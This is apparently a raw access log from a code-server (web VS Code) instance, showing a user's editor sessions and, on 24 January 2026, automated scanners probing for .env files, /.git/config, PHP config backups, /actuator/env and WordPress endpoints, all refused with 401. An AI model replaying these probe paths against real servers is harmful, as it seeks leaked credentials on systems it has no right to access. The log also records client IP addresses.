code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:14:53:25 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:14:53:25 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:14:53:25 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:14:53:25 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:14:53:26 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:14:53:26 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:14:53:26 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=0f3393c4-9e2a-4946-9ad8-b0aaf07f73b9" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:14:53:29 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[23/Jan/2026:14:53:54 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=3372c875-eae0-47bf-ac90-594d31ec1bdb&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 851305] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:14:53:54 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=5dab2e72-87ed-4594-8bbc-257e36116558&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 15941] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:15:03:30 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 50] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:15:03:30 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:15:03:31 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:15:03:31 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:15:03:31 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:15:03:31 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:15:03:31 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:15:03:32 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:15:03:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=3d66b6fa-1367-447c-9591-32d53be2e63c" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:15:03:35 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[23/Jan/2026:15:03:58 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=a992e5e8-9569-49f1-bc01-cfcb44e4784b&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 848793] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:15:03:58 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=5365061b-1fbf-4a8f-be99-35895d6e6bf1&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 16354] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:16:43:56 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 34.29.6.67] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[23/Jan/2026:16:43:56 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 34.29.6.67] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://code.profibot.hu" +[24/Jan/2026:00:15:25 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.254.106.197] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:25 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.254.106.197] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[24/Jan/2026:00:15:26 +0000] - 401 401 - GET https code.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:26 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-512.png" [Client 84.254.106.197] [Length 8489] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:26 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.254.106.197] [Length 464] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:26 +0000] - 401 401 - GET https code.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:26 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.254.106.197] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:26 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.254.106.197] [Length 804] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:26 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.254.106.197] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:26 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.254.106.197] [Length 4231] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:26 +0000] - 401 401 - GET https code.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:00:15:26 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.254.106.197] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:02:15:48 +0000] - 401 401 - HEAD https code.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[24/Jan/2026:02:15:48 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[24/Jan/2026:02:15:48 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[24/Jan/2026:02:15:48 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[24/Jan/2026:02:38:42 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 149.57.180.39] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:02:38:42 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 149.57.180.39] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:05:45:19 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 149.57.180.118] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:05:45:19 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 149.57.180.118] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:07:38:15 +0000] - 401 401 - HEAD https code.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[24/Jan/2026:07:38:15 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[24/Jan/2026:07:38:15 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[24/Jan/2026:07:38:15 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[24/Jan/2026:09:16:03 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 64.23.129.202] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[24/Jan/2026:09:16:03 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 64.23.129.202] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[24/Jan/2026:09:16:04 +0000] - 200 200 - GET http code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 64.23.129.202] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://code.profibot.hu/login" +[24/Jan/2026:09:16:04 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 64.23.129.202] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[24/Jan/2026:09:16:08 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 64.23.129.202] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[24/Jan/2026:09:16:09 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 64.23.129.202] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[24/Jan/2026:10:03:57 +0000] - 401 401 - GET http code.profibot.hu "/.git/config" [Client 45.148.10.244] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" "-" +[24/Jan/2026:10:03:58 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 45.148.10.244] [Length 29] [Gzip -] [Sent-to code-server] "-" "-" +[24/Jan/2026:10:03:58 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 45.148.10.244] [Length 29] [Gzip -] [Sent-to code-server] "-" "-" +[24/Jan/2026:17:42:52 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 141.98.11.181] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/wp-includes/ID3/license.txt" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/feed/" [Client 141.98.11.181] [Length 1582] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/xmlrpc.php?rsd" [Client 141.98.11.181] [Length 1555] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/blog/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/web/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/wordpress/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/wp/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/2020/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/2019/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/2021/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/shop/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/wp1/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/test/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/site/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:17:42:52 +0000] - 401 401 - GET http code.profibot.hu "/cms/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:18:24:48 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 37.76.2.117] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:18:24:48 +0000] - 304 304 - GET https code.profibot.hu "/login" [Client 37.76.2.117] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:18:24:48 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 37.76.2.117] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[24/Jan/2026:18:24:48 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 37.76.2.117] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[24/Jan/2026:18:24:49 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 37.76.2.117] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[24/Jan/2026:18:24:49 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.2.117] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[24/Jan/2026:18:24:50 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.2.117] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[24/Jan/2026:18:25:19 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.2.117] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[24/Jan/2026:22:26:28 +0000] - 401 401 - GET https code.profibot.hu "/configuration.php.bak" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:22:26:30 +0000] - 401 401 - GET https code.profibot.hu "/include/db.php.bak" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[24/Jan/2026:22:26:30 +0000] - 401 401 - GET https code.profibot.hu "/include/config.php.bak" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:22:26:30 +0000] - 401 401 - GET https code.profibot.hu "/.env.sample" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:22:26:30 +0000] - 401 401 - GET https code.profibot.hu "/api/.env" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:22:26:30 +0000] - 401 401 - GET https code.profibot.hu "/config/.env" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:22:26:34 +0000] - 401 401 - GET https code.profibot.hu "/actuator/env" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:22:26:34 +0000] - 401 401 - GET https code.profibot.hu "/.env.example" [Client 185.177.72.60] [Length 24] [Gzip -] 